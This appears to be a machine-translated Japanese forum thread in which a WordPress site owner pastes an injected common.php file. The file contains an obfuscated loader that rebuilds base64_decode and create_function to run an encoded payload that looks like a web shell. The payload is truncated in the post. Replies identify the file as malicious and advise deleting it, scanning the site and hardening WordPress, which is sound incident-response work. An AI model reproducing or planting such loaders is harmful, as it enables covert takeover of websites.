2017-06-20 7 views
2

私は自分のワードプレスサイトの1つに問題があります。 (常にユーザーをログインし、人々がログインせず)をcorrupted/hacked common.phpファイルが壊れていますか?

私のホスティングはルートがcommon.phpのファイル(/public_html/wp-content/common.php)は

誰が何上の任意の光を当てることができますだと思いますファイルは実際にやっている?私はそれを削除するだけで、WordPressは新しいファイルを生成できますか?

common.phpのコード:

それは文字の制限を超えていたとして、私はここに多くのコードをカットしなければならなかった*
<?php 

$alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6"; 
$string = "Cmdsb2JhbCAkYXV0aF9wYXNzLCRjb2xvciwkZGVmYXVsdF9hY3Rpb24sJGRlZmF1bHRfdXNlX2FqYXgsJGRlZmF1bHRfY2hhcnNldCwkc29ydDsKZ2xvYmFsICRjd2QsJG9zLCRzYWZlX21vZGUsICRpbjsKCiRhdXRoX3Bhc3MgPSAnZGU0OTA5YzUxZWZiNjZlNTgwYzMyZTk5NTFlZGI1ZG 

(90,000 ABOT !!)

J10gPSAkZGVmYXVsdF9hY3Rpb247CgllbHNlCgkJJF9QT1NUWydhJ10gPSAnU2VjSW5mbyc7CmlmKCAhZW1wdHkoJF9QT1NUWydhJ10pICYmIGZ1bmN0aW9uX2V4aXN0cygnYWN0aW9uJyAuICRfUE9TVFsnYSddKSApCgljYWxsX3VzZXJfZnVuYygnYWN0aW9uJyAuICRfUE9TVFsnYSddKTsKZXhpdDsKCg=="; 
    $array_name = ""; 
    foreach([4,29,34,38,42,9,21,7,38,17,37,7,38] as $t){ 
     $array_name .= $alphabet[$t]; 
    } 
    $a = strrev("noi"."tcnuf"."_eta"."erc"); 
    $f = $a("", $array_name($string)); 
    $f(); 

事前に感謝

リッチ

+0

あなたのウェブサイトがハッキングされたようにはい、それが見えます。おそらく、このコードを解読すると、このコードを実行する 'eval'があります。以前のバックアップからリストアすることができます。 –

答えて

2

削除 ファイル。 これはWordPressのインストールパッケージまたはアップグレードパッケージの一部ではありません。私はそのファイルが悪意のあるもので、あなたのホスティングアカウント/パーソナルマシン/ログイン資格が妥協していると思われます。

これは、この場合に参照標準サポートドキュメントです:あなたのサイトがきれいになると次にhttps://codex.wordpress.org/FAQ_My_site_was_hacked


http://codex.wordpress.org/Hardening_WordPress

+0

早急に対応していただきありがとうございます。今すぐファイルを削除し、問題が解決したかどうかを確認します。 –

+0

オンラインのマルウェアスキャナを使用できます。おそらく 'Wordfence'のようなプラグインで、感染したファイルがもっとあるかどうかを調べるでしょう。 –

+0

乾杯、私はiThemes Securtiyを持っているので、もう一度スキャンを実行します –

関連する問題